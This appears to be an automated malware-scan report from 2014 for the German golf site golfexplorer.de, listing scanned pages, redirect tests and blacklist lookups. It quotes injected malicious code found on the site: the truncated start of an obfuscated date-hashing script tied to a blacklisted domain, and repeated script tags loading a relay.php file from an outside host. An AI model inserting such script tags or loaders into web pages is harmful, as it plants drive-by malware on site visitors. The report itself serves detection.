Scanned pages/files
| Request | Server response | Status |
http://golfexplorer.de/ | 200 OK Content-Length: 13611 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 33414bbc.eu function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,221167763 ...[3442 bytes skipped]... | ||
http://golfexplorer.de/golfexplorer-geschichte.html | 200 OK Content-Length: 10605 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133664"></script> | ||
http://golfexplorer.de/test404page.js | 404 Not Found Content-Length: 478 Content-Type: text/html | clean |
http://golfexplorer.de/golfexplorer-verband.html | 200 OK Content-Length: 3472 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133674"></script> | ||
http://golfexplorer.de/golfexplorer-regeln.html | 200 OK Content-Length: 9918 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133672"></script> | ||
http://golfexplorer.de/golfexplorer-turnier.html | 200 OK Content-Length: 4295 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133673"></script> | ||
http://golfexplorer.de/golfexplorer-golfschlaeger.html | 200 OK Content-Length: 5415 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133666"></script> | ||
http://golfexplorer.de/golfexplorer-golfball.html | 200 OK Content-Length: 4092 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133665"></script> | ||
http://golfexplorer.de/golfexplorer-golfschwung.html | 200 OK Content-Length: 3927 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133668"></script> | ||
http://golfexplorer.de/golfexplorer-golfschule.html | 200 OK Content-Length: 4218 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://arte.helenparkhurst.net/relay.php?id=17133667"></script> | ||
http://golfexplorer.de/golfmenue.html | 404 Not Found Content-Length: 478 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: golfexplorer.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 16:06:07 GMT
Accept-Ranges: bytes
ETag: "366c0b4-352b-4fa298755e880"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13611
Content-Type: text/html
Last-Modified: Sat, 24 May 2014 18:29:38 GMT
...13611 bytes of data.
GET / HTTP/1.1
Host: golfexplorer.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 16:06:07 GMT
Accept-Ranges: bytes
ETag: "366c0b4-352b-4fa298755e880"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13611
Content-Type: text/html
Last-Modified: Sat, 24 May 2014 18:29:38 GMT
...13611 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: golfexplorer.de
Referer: http://www.google.com/search?q=golfexplorer.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: golfexplorer.de
Referer: http://www.google.com/search?q=golfexplorer.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=golfexplorer.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://golfexplorer.de/
Result: golfexplorer.de is not infected or malware details are not published yet.
Result: golfexplorer.de is not infected or malware details are not published yet.